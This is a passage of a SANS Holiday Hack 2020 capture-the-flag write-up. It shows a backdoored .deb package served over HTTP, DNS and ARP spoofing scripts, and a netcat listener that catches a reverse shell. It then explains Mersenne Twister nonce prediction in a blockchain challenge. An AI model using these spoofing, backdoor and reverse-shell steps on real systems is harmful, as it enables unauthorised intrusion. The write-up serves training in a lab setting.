&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; dpkg-deb --build --root-owner-group suriv_amd64
&lt;span class="go"&gt;dpkg-deb: building package &amp;#39;suriv&amp;#39; in &amp;#39;suriv_amd64.deb&amp;#39;.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, let's build our webroot, and place our payload:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; mkdir -p webroot/pub/jfrost/backdoor/
&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; mv suriv_amd64.deb ./webroot/pub/jfrost/backdoor/
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In a term:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; nc -nlvp &lt;span class="m"&gt;8080&lt;/span&gt;
&lt;span class="go"&gt;listening on [any] 8080 ...&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In another:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; webroot/
&lt;span class="gp"&gt;guest@e25a4aa6f87a:~/webroot$&lt;/span&gt; python3 -m http.server &lt;span class="m"&gt;80&lt;/span&gt;
&lt;span class="go"&gt;Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In yet another:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~/scripts$&lt;/span&gt; ./dns_resp.py
&lt;span class="go"&gt;.&lt;/span&gt;
&lt;span class="go"&gt;Sent 1 packets.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In yet &lt;em&gt;yet&lt;/em&gt; another:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~/scripts$&lt;/span&gt; ./arp_resp.py
&lt;span class="go"&gt;.&lt;/span&gt;
&lt;span class="go"&gt;Sent 1 packets.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And after a while, we get our reverse shell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; nc -nlvp &lt;span class="m"&gt;8080&lt;/span&gt;
&lt;span class="go"&gt;listening on [any] 8080 ...&lt;/span&gt;
&lt;span class="go"&gt;connect to [10.6.0.2] from (UNKNOWN) [10.6.6.35] 43898&lt;/span&gt;
&lt;span class="go"&gt;bash: /root/.bashrc: Permission denied&lt;/span&gt;
&lt;span class="gp"&gt;jfrost@e322017256e1:/$&lt;/span&gt; ls
&lt;span class="go"&gt;ls&lt;/span&gt;
&lt;span class="go"&gt;NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt  etc    lib64   opt   sbin  usr&lt;/span&gt;
&lt;span class="go"&gt;bin                                            home   libx32  proc  srv   var&lt;/span&gt;
&lt;span class="go"&gt;boot                                           lib    media   root  sys&lt;/span&gt;
&lt;span class="go"&gt;dev                                            lib32  mnt     run   tmp&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can now finally get the content of the &lt;code&gt;NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt&lt;/code&gt;
file.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;NORTH POLE
LAND USE BOARD
MEETING MINUTES&lt;/p&gt;
&lt;p&gt;January 20, 2020&lt;/p&gt;
&lt;p&gt;Meeting Location: All gathered in North Pole Municipal Building, 1 Santa
Claus Ln, North Pole&lt;/p&gt;
&lt;p&gt;Chairman Frost calls meeting to order at 7:30 PM North Pole Standard Time.&lt;/p&gt;
&lt;p&gt;Roll call of Board members please:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Chairman Jack Frost - Present&lt;/li&gt;
&lt;li&gt;Vice Chairman Mother Nature - Present&lt;/li&gt;
&lt;li&gt;Superman - Present&lt;/li&gt;
&lt;li&gt;Clarice - Present&lt;/li&gt;
&lt;li&gt;Yukon Cornelius - HERE!&lt;/li&gt;
&lt;li&gt;Ginger Breaddie - Present&lt;/li&gt;
&lt;li&gt;King Moonracer - Present&lt;/li&gt;
&lt;li&gt;Mrs. Donner - Present&lt;/li&gt;
&lt;li&gt;Tanta Kringle - Present&lt;/li&gt;
&lt;li&gt;Charlie In-the-Box - Here&lt;/li&gt;
&lt;li&gt;Krampus - Growl&lt;/li&gt;
&lt;li&gt;Dolly - Present&lt;/li&gt;
&lt;li&gt;Snow Miser - Heya!&lt;/li&gt;
&lt;li&gt;Alabaster Snowball - Hello&lt;/li&gt;
&lt;li&gt;Queen of the Winter Spirits - Present&lt;/li&gt;
&lt;/ul&gt;
&lt;dl class="docutils"&gt;
&lt;dt&gt;ALSO PRESENT:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last simple"&gt;
&lt;li&gt;Kris Kringle&lt;/li&gt;
&lt;li&gt;Pepper Minstix&lt;/li&gt;
&lt;li&gt;Heat Miser&lt;/li&gt;
&lt;li&gt;Father Time&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;p&gt;Chairman Frost made the required announcement concerning the Open Public
Meetings Act: Adequate notice of this meeting has been made -- displayed on
the bulletin board next to the Pole, listed on the North Pole community
website, and published in the North Pole Times newspaper -- for people who
are interested in this meeting.&lt;/p&gt;
&lt;p&gt;Review minutes for December 2020 meeting. Motion to accept – Mrs. Donner.
Second – Superman.  Minutes approved.&lt;/p&gt;
&lt;p&gt;OLD BUSINESS: No Old Business.&lt;/p&gt;
&lt;p&gt;RESOLUTIONS:
The board took up final discussions of the plans presented last year for
the expansion of Santa’s Castle to include new courtyard, additional
floors, elevator, roughly tripling the size of the current castle.
Architect Ms. Pepper reviewed the planned changes and engineering reports.
Chairman Frost noted, “These changes will put a heavy toll on the
infrastructure of the North Pole.”  Mr. Krampus replied, “The
infrastructure has already been expanded to handle it quite easily.”
Chairman Frost then noted, “But the additional traffic will be a burden on
local residents.”  Dolly explained traffic projections were all in
alignment with existing roadways.  Chairman Frost then exclaimed, “But with
all the attention focused on Santa and his castle, how will people ever
come to refer to the North Pole as ‘The Frostiest Place on Earth?’”  Mr.
In-the-Box pointed out that new tourist-friendly taglines are always under
consideration by the North Pole Chamber of Commerce, and are not a matter
for this Board.  Mrs. Nature made a motion to approve.  Seconded by Mr.
Cornelius.  &lt;strong&gt;Tanta Kringle recused herself&lt;/strong&gt; from the vote given her
adoption of Kris Kringle as a son early in his life.&lt;/p&gt;
&lt;p&gt;Approved:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Mother Nature&lt;/li&gt;
&lt;li&gt;Superman&lt;/li&gt;
&lt;li&gt;Clarice&lt;/li&gt;
&lt;li&gt;Yukon Cornelius&lt;/li&gt;
&lt;li&gt;Ginger Breaddie&lt;/li&gt;
&lt;li&gt;King Moonracer&lt;/li&gt;
&lt;li&gt;Mrs. Donner&lt;/li&gt;
&lt;li&gt;Charlie In the Box&lt;/li&gt;
&lt;li&gt;Krampus&lt;/li&gt;
&lt;li&gt;Dolly&lt;/li&gt;
&lt;li&gt;Snow Miser&lt;/li&gt;
&lt;li&gt;Alabaster Snowball&lt;/li&gt;
&lt;li&gt;Queen of the Winter Spirits&lt;/li&gt;
&lt;/ul&gt;
&lt;dl class="docutils"&gt;
&lt;dt&gt;Opposed:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last simple"&gt;
&lt;li&gt;Jack Frost&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;p&gt;Resolution carries.  Construction approved.&lt;/p&gt;
&lt;p&gt;NEW BUSINESS:&lt;/p&gt;
&lt;p&gt;Father Time Castle, new oversized furnace to be installed by Heat Miser
Furnace, Inc.  Mr. H. Miser described the plan for installing new furnace
to replace the faltering one in Mr. Time’s 20,000 sq ft castle. Ms. G.
Breaddie pointed out that the proposed new furnace is 900,000,000 BTUs, a
figure she considers “incredibly high for a building that size, likely two
orders of magnitude too high.  Why, it might burn the whole North Pole
down!”  Mr. H. Miser replied with a laugh, “That’s the whole point!”  The
board voted unanimously to reject the initial proposal, recommending that
Mr. Miser devise a more realistic and safe plan for Mr. Time’s castle
heating system.&lt;/p&gt;
&lt;p&gt;Motion to adjourn – So moved, Krampus.  Second – Clarice. All in favor –
aye. None opposed, although Chairman Frost made another note of his strong
disagreement with the approval of the Kringle Castle expansion plan.
Meeting adjourned.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Sounds like things got pretty &lt;em&gt;heated&lt;/em&gt; (get it?) at the North Pole land use
board meeting. Plans to expand Santa's Castle were approved by all, except by
Jack Frost. Tanta Kringle recused herself due to the fact she adopted Santa,
and was therefore not impartial.&lt;/p&gt;
&lt;p&gt;Regarding the technical aspect of this challenge, if you ask yourself how we
could listen on TCP port 80 or crafting and sending raw packets without being
&lt;code&gt;root&lt;/code&gt; on our machine, it's because the Python executable has the proper
capabilities:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@c55799ca6034:~$&lt;/span&gt; getcap /usr/bin/python3.8
&lt;span class="go"&gt;/usr/bin/python3.8 = cap_net_bind_service,cap_net_admin,cap_net_raw+eip&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;CAP_NET_BIND_SERVICE&lt;/code&gt;: Bind a socket to Internet domain privileged
ports (port numbers less than 1024).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;CAP_NET_ADMIN&lt;/code&gt;: Perform various network-related operations.&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;&lt;code&gt;CAP_NET_RAW&lt;/code&gt;:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;use RAW and PACKET sockets;&lt;/li&gt;
&lt;li&gt;bind to any address for transparent proxying.&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;More informations on Linux capabilities &lt;a class="reference external" href="https://linux.die.net/man/7/capabilities"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Regarding the TLS traffic between our machine and the hijacked machine
(remember the Werkzeug server?), I guess it's some kind of C&amp;amp;C traffic
simulation. I wanted to investigate using the reverse shell, but we're dropped
to a low-privileged user called &lt;code&gt;jfrost&lt;/code&gt;. Oh well!&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-10-defeat-fingerprint-sensor"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id43"&gt;Objective 10: Defeat Fingerprint Sensor&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Several ways to bypass the fingerprint sensor were detailed in &lt;a class="reference external" href="#second-method-pretending-we-have-the-bits-and-bobs"&gt;this section&lt;/a&gt;
and &lt;a class="reference external" href="#third-method-who-needs-bits-and-bobs-anyway"&gt;this section&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-11"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id44"&gt;Objective 11:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="naughty-nice-list-with-blockchain-investigation-part-1"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id45"&gt;Naughty/Nice List with Blockchain Investigation Part 1&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;In Santa's office, we can find the Naughty/Nice list, right on the desk. It's
stored as a blockchain that you can download &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/blockchain.dat"&gt;here&lt;/a&gt;.
To get a presentation on the Naughty/Nice blockchain, you can check &lt;a class="reference external" href="https://www.youtube.com/watch?v=reKsZ8E44vw"&gt;this
KringleCon talk from Prof. Qwerty Petabyte&lt;/a&gt;.
You can also download the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/OfficialNaughtyNiceBlockchainEducationPack.zip"&gt;Official Naughty/Nice Blockchain Education Pack&lt;/a&gt;,
which includes Python code to interact with the &lt;code&gt;blockchain.dat&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Just quickly, the information to determine is naughty or nice are stored in
a block:&lt;/p&gt;
&lt;img alt="Block have the following structure: 1. Index of the block 2. Nonce (random value) 3. Person ID 4. Elf ID 5. Number of documents 6. Naughty/Nice points 7. Naughty/Nice flag 8. Documents (PDFs, images, videos, texts, blobs, etc.) 9. Date/time the block was generated 10. Hash of the previous block 11. Signature of the hash of data 1-10 12. Hash of the block and signature (data 1-11)" class="align-center" src="/images/sans-christmas-challenge-2020/blockchain_block_structure.png" /&gt;
&lt;p&gt;The nonce is a 64-bit random value, that is used to prevent attacks on MD5
(yeah, the blockchain uses MD5 as a hash function, because it was implemented
long ago).&lt;/p&gt;
&lt;p&gt;But how secure are these nonces? Let's take a look at the &lt;code&gt;naughty_nice.py&lt;/code&gt;
from the blockchain education pack linked earlier, to see how they are
generated:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Block&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="fm"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;block_data&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;previous_hash&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;load&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;False&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;genesis&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;False&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;genesis&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;load&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;all&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;block_data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;documents&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;block_data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;pid&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;block_data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;rid&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;block_data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;score&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;block_data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sign&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;previous_hash&lt;/span&gt;&lt;span class="p"&gt;]):&lt;/span&gt;
                    &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;index&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;index&lt;/span&gt;
                    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;index&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nonce&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="c1"&gt;# genesis block&lt;/span&gt;
                    &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;span class="hll"&gt;                        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nonce&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;randrange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0xFFFFFFFFFFFFFFFF&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;They are generated with &lt;code&gt;random.randrange&lt;/code&gt;. Is this function
cryptographically secure? Let's check the &lt;a class="reference external" href="https://docs.python.org/3/library/random.html"&gt;Python documentation&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
Almost all module functions depend on the basic function random(), which
generates a random float uniformly in the semi-open range [0.0, 1.0).
Python uses the &lt;strong&gt;Mersenne Twister&lt;/strong&gt; as the core generator. It produces
53-bit precision floats and has a period of 2**19937-1. The underlying
implementation in C is both fast and threadsafe. The Mersenne Twister is
one of the most extensively tested random number generators in existence.
However, being completely deterministic, it is not suitable for all
purposes, and is completely unsuitable for cryptographic purposes.&lt;/blockquote&gt;
&lt;p&gt;The randomness is produced via a &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Mersenne_Twister"&gt;Mersenne Twister&lt;/a&gt;.
It's a Pseudo-Random Number Generator (emphasis on Pseudo). It's not meant to
be cryptographically secure. In fact, it has serious drawbacks that are
detailed in &lt;a class="reference external" href="https://www.youtube.com/watch?v=Jo5Nlbqd-Vg"&gt;this KringleCon talk from Tom Liston&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Basically, a Mersenne Twister has an internal state of 624 32-bit integers.
When a caller requests 32 bits of randomness, the Mersenne Twister takes an
integer from its internal state, &lt;em&gt;tampers it&lt;/em&gt;, then returns it. It then moves
onto the next integer in the state, and so on. Once every 624 integers have
been tampered with, the internal state is &lt;em&gt;twisted&lt;/em&gt;, and the Twister starts
again from the first integer.&lt;/p&gt;
&lt;p&gt;The problem is that the tampering operation is reversible. So, given the
output of a Mersenne Twister, we can &lt;em&gt;untamper it&lt;/em&gt;, and get back the integer
that was in the internal state. If we have 624 outputs, we can reconstruct
the entire internal state of the Mersenne Twister. And this is a problem,
because two Mersenne Twisters with the same internal states will produce the
same numbers.&lt;/p&gt;
&lt;p&gt;But wait, a Mersenne Twister produces random integers of 32 bits, so how can
we get nonces wich are 64 bit long? To understand this, we have to look at
how &lt;code&gt;random.randrange&lt;/code&gt; works. Remember that it's the function used to
generated the nonces:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nonce&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;randrange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0xFFFFFFFFFFFFFFFF&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;a class="reference external" href="https://github.com/python/cpython/blob/a9621bb301dba44494e81edc00e3a3b62c96af26/Lib/random.py#L291"&gt;Here&lt;/a&gt;'s
its implementation. The interesting chunk of code is this one:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;stop&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;istart&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;span class="hll"&gt;            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;_randbelow&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;istart&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Indeed, in our example &lt;code&gt;random.randrange&lt;/code&gt; is called with only a upper
value, so we enter this &lt;code&gt;if&lt;/code&gt; clause. This means that the generation is
delegated to &lt;code&gt;_randbelow&lt;/code&gt;. It's defined &lt;a class="reference external" href="https://github.com/python/cpython/blob/a9621bb301dba44494e81edc00e3a3b62c96af26/Lib/random.py#L271"&gt;here&lt;/a&gt;
as equal to &lt;code&gt;_randbelow_with_getrandbits&lt;/code&gt;, which is implemented &lt;a class="reference external" href="https://github.com/python/cpython/blob/a9621bb301dba44494e81edc00e3a3b62c96af26/Lib/random.py#L238"&gt;here&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;_randbelow_with_getrandbits&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="s2"&gt;&amp;quot;Return a random int in the range [0,n).  Returns 0 if n==0.&amp;quot;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
    &lt;span class="n"&gt;getrandbits&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getrandbits&lt;/span&gt;
    &lt;span class="n"&gt;k&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;bit_length&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;  &lt;span class="c1"&gt;# don&amp;#39;t use (n-1) here because n can be 1&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;getrandbits&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# 0 &amp;lt;= r &amp;lt; 2**k&lt;/span&gt;
&lt;/span&gt;    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;span class="hll"&gt;        &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;getrandbits&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Basically, it computes &lt;code&gt;k&lt;/code&gt;, the size in bits of our upper limit, and
generates &lt;code&gt;k&lt;/code&gt; random bits, using &lt;code&gt;getrandbits&lt;/code&gt;. In our case,
&lt;code&gt;k&lt;/code&gt; is equal to 64, since our upper limit is &lt;code&gt;0xFFFFFFFFFFFFFFFF&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;So, let's check function &lt;code&gt;getrandbits&lt;/code&gt;. But where is it implemented?
There is one function with this name in our &lt;code&gt;random.py&lt;/code&gt; file, but it's
in another class, the class &lt;code&gt;SystemRandom&lt;/code&gt;, which uses a source of
entropy from the operating system. But it's not the class we're using here.&lt;/p&gt;
&lt;p&gt;In fact, our implementation is &lt;a class="reference external" href="https://github.com/python/cpython/blob/b8fde8b5418b75d2935d0ff93b20d45d5350f206/Modules/_randommodule.c#L460"&gt;here, coded in C&lt;/a&gt;.
Let's study how it works. We can discard the beginning of the function, since
in our case, &lt;code&gt;k=64&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="n"&gt;words&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;wordarray&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;uint32_t&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;PyMem_Malloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;words&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;First, it creates an array that will contain the words receiving our random
